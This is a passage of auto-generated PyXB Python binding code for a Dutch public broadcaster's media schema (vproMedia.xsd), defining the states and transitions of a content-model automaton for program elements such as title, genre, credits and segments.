counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 225, 6))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 245, 6))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 253, 6))
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 261, 6))
counters.add(cc_3)
cc_4 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 280, 6))
counters.add(cc_4)
cc_5 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 287, 6))
counters.add(cc_5)
cc_6 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 288, 6))
counters.add(cc_6)
cc_7 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 289, 6))
counters.add(cc_7)
cc_8 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 290, 6))
counters.add(cc_8)
cc_9 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 291, 6))
counters.add(cc_9)
cc_10 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 292, 6))
counters.add(cc_10)
cc_11 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 293, 6))
counters.add(cc_11)
cc_12 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 294, 6))
counters.add(cc_12)
cc_13 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 295, 6))
counters.add(cc_13)
cc_14 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 296, 6))
counters.add(cc_14)
cc_15 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 297, 6))
counters.add(cc_15)
cc_16 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 298, 6))
counters.add(cc_16)
cc_17 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 299, 6))
counters.add(cc_17)
cc_18 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 300, 6))
counters.add(cc_18)
cc_19 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 301, 6))
counters.add(cc_19)
cc_20 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 302, 6))
counters.add(cc_20)
cc_21 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 303, 6))
counters.add(cc_21)
cc_22 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 304, 6))
counters.add(cc_22)
cc_23 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 305, 6))
counters.add(cc_23)
cc_24 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 306, 6))
counters.add(cc_24)
cc_25 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 307, 6))
counters.add(cc_25)
cc_26 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 308, 6))
counters.add(cc_26)
cc_27 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 309, 6))
counters.add(cc_27)
cc_28 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 310, 6))
counters.add(cc_28)
cc_29 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 311, 6))
counters.add(cc_29)
cc_30 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 312, 6))
counters.add(cc_30)
cc_31 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 313, 6))
counters.add(cc_31)
cc_32 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 314, 6))
counters.add(cc_32)
cc_33 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 91, 10))
counters.add(cc_33)
cc_34 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 92, 10))
counters.add(cc_34)
cc_35 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 99, 10))
counters.add(cc_35)
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'crid')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 225, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = None
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'broadcaster')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 237, 6))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = None
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'portal')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 245, 6))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = None
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'exclusive')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 253, 6))
st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = None
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'region')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 261, 6))
st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
final_update = set()
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'title')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 269, 6))
st_5 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_5)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_4, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'description')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 280, 6))
st_6 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_6)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_5, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'genre')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 287, 6))
st_7 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_7)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_6, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'tag')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 288, 6))
st_8 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_8)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_7, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'intentions')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 289, 6))
st_9 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_9)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_8, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'targetGroups')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 290, 6))
st_10 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_10)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_9, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'geoLocations')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 291, 6))
st_11 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_11)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_10, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'topics')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 292, 6))
st_12 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_12)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_11, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'source')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 293, 6))
st_13 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_13)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_12, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'country')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 294, 6))
st_14 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_14)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_13, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'language')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 295, 6))
st_15 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_15)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_14, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'isDubbed')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 296, 6))
st_16 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_16)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_15, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'availableSubtitles')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 297, 6))
st_17 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_17)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_16, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'avAttributes')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 298, 6))
st_18 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_18)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_17, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'releaseYear')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 299, 6))
st_19 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_19)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_18, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'duration')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 300, 6))
st_20 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_20)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_19, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'credits')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 301, 6))
st_21 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_21)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_20, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'award')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 302, 6))
st_22 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_22)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_21, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'descendantOf')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 303, 6))
st_23 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_23)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_22, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'memberOf')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 304, 6))
st_24 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_24)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_23, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'ageRating')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 305, 6))
st_25 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_25)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_24, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'contentRating')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 306, 6))
st_26 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_26)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_25, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'email')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 307, 6))
st_27 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_27)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_26, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'website')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 308, 6))
st_28 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_28)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_27, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'twitter')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 309, 6))
st_29 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_29)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_28, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'teletext')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 310, 6))
st_30 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_30)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_29, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'prediction')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 311, 6))
st_31 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_31)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_30, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'locations')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 312, 6))
st_32 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_32)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_31, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'relation')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 313, 6))
st_33 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_33)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_32, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'images')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 314, 6))
st_34 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_34)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_33, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'scheduleEvents')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 91, 10))
st_35 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_35)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_34, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'episodeOf')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 92, 10))
st_36 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_36)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_35, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'segments')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 99, 10))
st_37 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_37)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
transitions.append(fac.Transition(st_2, [
]))
transitions.append(fac.Transition(st_3, [
]))
transitions.append(fac.Transition(st_4, [
]))
transitions.append(fac.Transition(st_5, [
]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_1, False) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_2, False) ]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_3, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_3, False) ]))
st_4._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_5, [
]))
transitions.append(fac.Transition(st_6, [
]))
transitions.append(fac.Transition(st_7, [
]))
transitions.append(fac.Transition(st_8, [
]))
transitions.append(fac.Transition(st_9, [
]))
transitions.append(fac.Transition(st_10, [
]))
transitions.append(fac.Transition(st_11, [
]))
transitions.append(fac.Transition(st_12, [
]))
transitions.append(fac.Transition(st_13, [
]))
transitions.append(fac.Transition(st_14, [
]))
transitions.append(fac.Transition(st_15, [
]))
transitions.append(fac.Transition(st_16, [
]))
transitions.append(fac.Transition(st_17, [
]))
transitions.append(fac.Transition(st_18, [
]))
transitions.append(fac.Transition(st_19, [
]))
transitions.append(fac.Transition(st_20, [
]))
transitions.append(fac.Transition(st_21, [
]))
transitions.append(fac.Transition(st_22, [
]))
transitions.append(fac.Transition(st_23, [
]))
transitions.append(fac.Transition(st_24, [
]))
transitions.append(fac.Transition(st_25, [
]))
transitions.append(fac.Transition(st_26, [
]))
transitions.append(fac.Transition(st_27, [
]))
transitions.append(fac.Transition(st_28, [
]))
transitions.append(fac.Transition(st_29, [
]))
transitions.append(fac.Transition(st_30, [
]))
transitions.append(fac.Transition(st_31, [
]))
transitions.append(fac.Transition(st_32, [
]))
transitions.append(fac.Transition(st_33, [
]))
transitions.append(fac.Transition(st_34, [
]))
transitions.append(fac.Transition(st_35, [
]))
transitions.append(fac.Transition(st_36, [
]))
transitions.append(fac.Transition(st_37, [
]))
st_5._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_4, True) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_37, [
fac.UpdateInstruction(cc_4, False) ]))
st_6._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_5, True) ]))
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_37, [
fac.UpdateInstruction(cc_5, False) ]))
st_7._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_6, True) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_6, False) ]))
